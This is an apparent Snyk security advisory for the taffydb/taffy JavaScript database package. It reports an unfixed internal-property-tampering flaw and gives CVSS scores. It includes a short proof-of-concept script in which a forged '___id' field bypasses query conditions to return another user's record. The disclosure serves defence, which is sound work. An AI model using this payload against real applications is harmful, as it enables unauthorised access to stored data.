Internal Property Tampering Affecting taffydb package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept
    EPSS
    0.54% (78th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-TAFFYDB-2992450
  • published 5 Feb 2020
  • disclosed 5 Feb 2020
  • credit Feng Xiao (xiaofen9)

How to fix?

There is no fixed version for taffydb.

Overview

taffydb is an open source JavaScript library that provides in-memory database capabilities

Affected versions of this package are vulnerable to Internal Property Tampering. taffy sets an internal index for each data item in its DB. However, it is found that the internal index can be forged by adding additional properties into user-input. If an index is found in the query, taffyDB will ignore other query conditions and directly return the indexed data item. Moreover, the internal index is in an easily-guessable format (e.g. T000002R000001). As such, attackers can use this vulnerability to access any data items in the DB and exploit an SQL Injection.

Note: The taffy package has been deprecated by the author. Its successor package, taffydb, is also found to be vulnerable and is not actively maintained.

PoC

var TAFFY = require('taffy');
var friends = TAFFY([
        {"id":1,"gender":"M","username":"Smith","password":"aaa","status":"Active"},
        {"id":2,"gender":"F","username":"Ruth","password":"bbb","status":"Active"},
        {"id":3,"gender":"M","username":"Stevenson","password":"ccc","status":"Active"},
        {"id":4,"gender":"F","username":"Gill","password":"ddd","status":"Active"}
]);

var json = {username:"Smith", "password":"123", "___id":"T000002R000002", "___s":true}; var item1 = friends(json); console.log(item1.first());

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
7.5 high
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    None
  • Availability (A)
    None
Expand this section

NVD

7.5 high